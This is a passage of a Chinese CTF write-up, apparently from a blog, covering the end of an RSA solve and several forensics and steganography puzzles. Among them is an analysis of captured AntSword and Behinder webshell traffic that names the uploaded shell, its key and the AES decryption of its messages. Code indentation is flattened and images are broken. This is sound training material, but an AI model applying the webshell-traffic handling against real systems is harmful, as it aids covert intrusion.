e = 19458216662993202562182929756256684791318810848802754020883513588583377528821730559897870095442161189229950925325157413999927847684731484753811988111830295294129447423655650029218971567158117911790213848402209470536199246476182240248742771389082526603384625792117047996128232952372477895218147279573573322975526303267821446640338606290250958710008158544852602338088244940388562828263436457418528981476220691508040085291576643321726669065360399003917048894093458055139757991688086912143763420958307099065105543361779847689716282373299487102518794317683805758527645283956734672229827240143254092779918701447288342107763
alpha = 8
root = 127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336
p = prePrime(libnum.nroot((n0//root),58))
print()
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2
phi_n = (p**alpha - p**(alpha-1)) * (q**(alpha*2) - q**(alpha*2-1)) * (r**(alpha*4) - r**(alpha*4-1)) * (s**2 - s)
d = gmpy2.invert(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
后经提醒,因为p>m,也可以直接mod p
MISC
签到打卡完成
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nGzxhRTG-1674185779352)(null)]](https://img-blog.csdnimg.cn/8165ec489496467ebb0aa895edbd1a91.png)
颜色有点淡,可以用ps拉对比度
也可以提取(239,239,239)的颜色
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pTupE8Mo-1674185779387)(null)]](https://img-blog.csdnimg.cn/071a2f4203604817b5e1f71cd052d3da.png)
不好扫可以用CQR扫完再生成一个
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SLYi0FMy-1674185779255)(null)]](https://img-blog.csdnimg.cn/341798f143af40c3a798c687767a4e99.png)
发送SICTF获得flag
color
在这里插入图片描述
一张混淆的图片,能看出二维码的痕迹
文件尾有额外数据,是压缩包 补上PK头解压得到加密脚本
from PIL import Image
import random
flag = Image.open("flag.png")
flag = flag.convert("RGB")
new = Image.new("RGB",flag.size)
h=flag.height
w=flag.width
num=[0,128,255]
for i in range(h):
for k in range(w):
r,g,b = flag.getpixel((i,k))
if r == 0 and g == 0 and b ==0:
new.putpixel((i,k),((random.choice(num),random.choice(num),random.choice(num))))
else:
new.putpixel((i,k),(random.randint(0,255),random.randint(0,255),random.randint(0,255)))
new.save('save.png')
这个脚本,把黑色像素替换的rgb替换为0 128 255中的随机值
白色的rgb替换为0-255中的随机值
反向写一个脚本
from PIL import Image
load = Image.open('save.png')
flag = Image.new('RGB',load.size)
h=flag.height
w=flag.width
for i in range(h):
for k in range(w):
r,g,b = load.getpixel((i,k))
if (r == 0 or r==128 or r == 255) and (g == 0 or g==128 or g == 255) and (b == 0 or b==128 or b == 255):
flag.putpixel((i,k),(0,0,0))
else:
flag.putpixel((i,k),(255,255,255))
#flag.show()
flag.save('flag.png')
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vqkIS4Ah-1674185779180)(null)]](https://img-blog.csdnimg.cn/27e7190fe5504dc9bf567187437bcc19.png)
扫码得到flag
geek_challenge
交互计算题
写pwntools交互脚本,解5000次就很不理解,对服务器不友好
from pwn import *
context.log_level = ('debug')
r = remote('ctf.qsnctf.com',10840)
r.recvuntil(b'\n\n')
i = 0
while True:
calc = r.recvline(b'= ?')[:-4]
r.sendlineafter('answer:',str(eval(calc)))
if r.recvline()==b'Good job!\n':
continue
print(i)
r.interactive()
hacker
蚁剑流量
tcp20流 追踪HTTP
去掉前九位解base64 可以得到
U2FsdGVkX19bEN3D8vFeG39VyYXPwle2mMQLh5T1HYiSI1XCx7rJhsDnp9qLpUQB
yITd05Uu05ZAv0o=e264c55be
/tmp
a7eb3df874e
U2FsdGVkX19是Salted__ 一般是网站加盐的AES DES TriDES RABBIT RC4
需要key,前面流可以经常见到一个文件夹
`cd /var/tmp/password1sGui_1s_shumu
解rabbit得到flag
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EDv5sjaH-1674185779077)(null)]](https://img-blog.csdnimg.cn/de3c84caef254bc188579a8fdd44a68a.png)
hacker2
大黑客树木再次上传了shell并用工具进行连接,他在上传目录的一堆测试txt中找到了重要的字符串,我们观察并截取了流量
你能告诉我们他上传的shell的名称和key值以及最终找到的重要字符串吗?
flag格式:SICTF{shell名称_密钥_文本文件中存储的字符串}
TCP第0流就可以看到 冰蝎马的特征
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CCjSXYn9-1674185779218)(null)]](https://img-blog.csdnimg.cn/a27e3b295f60429780fa12e6127d0b79.png)
key是7d7c23e87b47368b
TCP第13流可以看到she1l.php
顺便讲一下这一流中写的是冰蝎控制端与被控端进行认证的流量
如何就是慢慢看流量
TCP46流追踪HTTP可以找到
uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA==
冰蝎AES的方式是CBCmode IV为16个\x00
用脚本解密
from base64 import b64decode
from Crypto.Cipher import AES
def aes_def(key,input_text):
# 非保留模式
if b"==" not in input_text:
input_text = input_text + b"=="
input_text = b64decode(input_text)
mode = AES.MODE_CBC
iv = b'\0' * 16
cryptos = AES.new(key, mode, iv)
plain_text = cryptos.decrypt(input_text).decode('utf-8', 'ignore')
return plain_text
key=b"7d7c23e87b47368b"
message = b'uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA=='
decode_message = aes_def(key,message)
print(decode_message)
得到
{"status":"c3VjY2Vzcw==","msg":"YzByUmVjdCEhIQ=="}
msg解码得到 c0rRect!!!
拼起来得到flag
SICTF{she1l_7d7c23e87b47368b_c0rRect!!!}
ezmisc
二血 这题难度还行,最少解的题,我和一血都是非预期
解压的时候,flag.zip是伪加密,修改两个09为00后可以解压
f1ag.png
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LevhOFJf-1674185779663)(null)\
这是一只流浪的flag留给我们的秘密:我需要一个中文拼音全拼。
肯定不是泷奈,
看看secret.txt里面
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Rl9f8Gz8-1674185779115)(null)]](https://img-blog.csdnimg.cn/07b06087d2bb474eb1c643155c8ce1f4.png)
尝试倒序解base64
发现是三个数字,联想为rgb,一共有268780行,刚好和f1ag的分辨率对应
写脚本转为图片,颜色是rgb还是bgr不影响解题(非预期)
from PIL import Image
import base64
secret = open('secret~.txt','r').readlines()[:-2:]
f1ag = Image.open('f1ag.png')
print(f1ag.size)
secret_img = Image.new('RGB',f1ag.size)
h=f1ag.height
w=f1ag.width
for i in range(w):
for k in range(h):
now_index = (i*h)+k
decode_base = [int(base64.b64decode(x).decode()) for x in (secret[now_index][::-1].split()[::-1])]
# rgb还是bgr不影响解题
r,g,b = r,g,b = decode_base[0],decode_base[1],decode_base[2]
secret_img.putpixel((i,k),(r,g,b))
# secret_img.show()
secret_img.save('wtf2.png')
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qphrfw1y-1674185779486)(null)]
其实已经可以看出来六花了
拿这个图和f1ag异或
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D23bKhjp-1674185779768)(null)\
小鸟游六花,我甚至把原图都找出来了 pid 93430703
f1agpng文件尾有oursecret的隐写特征
oursecret解f1ag.png 密码xiaoniaoyouliuhua
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FOtxXAQS-1674185779866)(null)]](https://img-blog.csdnimg.cn/73a62d84ca094eae94f136835ac166cb.png)
得到flag.txt
没用到Xkey和attachment.7z,非预期了
在这里插入图片描述
其实xkey解XXencode是7z的密码,里面是个混淆的加密脚本
王八树木
打开树木
一眼jpg倒序,反过来文件尾有个加密zip
爆破得到密码123456
得到密码SI!!!!!!
jpg解silentEye
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dAOHvGtK-1674185779627)(null)]](https://img-blog.csdnimg.cn/c1c5c0f0aa584708b97f3232c364532d.png)
得到猫脸变换的参数
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RpkbYlE9-1674185779523)(null)]](https://img-blog.csdnimg.cn/db90527f34d54bb28345bdcf1f59ea27.png)
脚本还原
import cv2
import numpy as np
import matplotlib.image as mpimg
def de_arnold(img,shuffle_time,a,b):
r, c, d = img.shape
dp = np.zeros(img.shape, np.uint8)
for s in range(shuffle_time):
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
dp[x, y, :] = img[i, j, :]
img = np.copy(dp)
return img
img = mpimg.imread('flag.bmp')
img = img[:, :, ::-1]
new = de_arnold(img, 2, 1, 2)
cv2.imshow('picture', new)
cv2.waitKey(0)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-npR4YrUI-1674185779592)(null)]](https://img-blog.csdnimg.cn/3c33a291c4bd437087a8c440457ec87a.png)
Revenge
zip是伪加密
uncompyle6反编译pyc得到加密脚本
# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 14 2022, 12:59:47)
# [GCC 9.4.0]
# Embedded file name: encode.py
# Compiled at: 2023-01-17 14:47:26
# Size of source mod 2**32: 439 bytes
import secret
import cv2
import numpy as np
from random import randint
Hg = np.float32(cv2.imread('flag.png', 1))
for i in range(64):
for j in range(64):
Si = randint(0, 2)
Fe = Hg[:, :, Si]
Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
if secret[(i * 64 + j)] == '1':
Mg[(7, 7)] = 20
else:
if secret[(i * 64 + j)] == '0':
Mg[(7, 7)] = -20
Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8] = cv2.idct(Mg)
Hg[:, :, Si] = Fe
cv2.imwrite('flag.png', Hg)
# okay decompiling key.pyc
8x8 dct 分块变换
secret是0和1组成的
Si是0-2的随机数,爆破一下
import cv2
import numpy as np
from random import randint
# read the original image
Hg = np.float32(cv2.imread('../flag.png', 1))
# create an empty list to store the hidden information
secret = []
# iterate through each 8x8 block
for i in range(64):
for j in range(64):
for Si in range(3):
Fe = Hg[:, :, Si]
Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
if Mg[(7, 7)] > 10:
secret.append('1')
elif Mg[(7, 7)] < -10 :
secret.append('0')
# print the recovered secret message
print(''.join(secret))
得到
0100101001110000001100100100101001000100010001000110101101101101010100010011000101010010011100110101000100111001011001100110101000110110001100110111000001110100011000010101100001000001010100110110001001000111011001010100101000110101011101010111000100110010010101010110001101100101010101110100110001100101010100110100001001111000010001100101011101000110010101010101100000110111011010000110001101010111001100100110001001101010010100100110110101000111010100100110111001001011010101000011100101110001010011100110011001100100010001110100110000110010011100100011100001110011001110000110110101101011010100010110111101000110010001100110010101010110001101000101101001111000001100100100011101000010010100100101010101010101011000110101011001101001011010110101001001100101010101100111010101011010011011110011100100110111010101010100011001011001011001110101001100110001010100100011010101000110010000110101001101100010011001010110101001000101011011110100001101110111010100010111011101000110010000110101100101110111010101000100101101101011001101110101001100110110011101010101101001101001010110100110100101100110010000100011001001000001011000100100100001110000011001010101101001110110010000010111100101000010010011010100101001100111010101000110101001001011010100110111011101110010011110100101001001110010011100100011001100110011001100100111010001100001001110000110010101100100001101010111100001000111010000100110100000110101010011100110001001110010010101010111100001100011011101110100001001001011010110000101011101100010011010000100110101000011011110100101101000110010010001000111000101110100010000010011000101110100011000110111100101001010011011100011011101000001011101010111101001000110010010110100100000111001011001110110110101101111010011100100001001101010010010100111001101111001011000100100010100110100011010100100101000110101011100100111010101001100010000010100001001000010001100100100110001101111010010100111011100110110011101110110010100110001010010000110000101010101011010000110101101010010010011010110101100110010001101000110001001000101011101000011001001110011011011110101010101110011011010000101010101100111010101000101010101010100010001010100110101010100011010010100110100111001001100100011001101101001011100110101010101110101011011100100101000110011010100010110100001100100010011100011100101001100011000110100111000110100001101110011011001101011010000110110010001110011010001110011001001000001011100010110010101110111011110000111100001011010010001000110000101010101010001010111001101010011011000100011011100110100011001110101100101010000001100110111000000111001001101000011010001110000010100000110100001110110010011000111001001101111010011000011100001101000011010100101011001101111010010000111011101000100011110100110001001000011011000110101010101011001010000110011001001101000010110100011001101110000001100100111011101101110010110100101001101100011011011100101101001100100011110000011001100110001011010100101000101000101011100100011011001001011011110000110111101100101001100100110001001101010011000010111001001110011001101110111000001000001011100110100100001101001011100000100110101000010001101010110000101100010001100010100000101110100011100010110100101100110001100100111100001001100010001000100101100110011010001000101001100110101011100010110100001000100010000010101000001001010010011000100101001101111011110100100110001101011011110010100010101011000011101110110111001010011001100110110010101110011010100010110010101001100011000010100001001001010010101010100011001101101011100100100011101011001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
去掉最后补全用的0,
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oGCnQ6Sr-1674185779450)(null)]](https://img-blog.csdnimg.cn/884dbafd802c45c3a8309116338f3e33.png)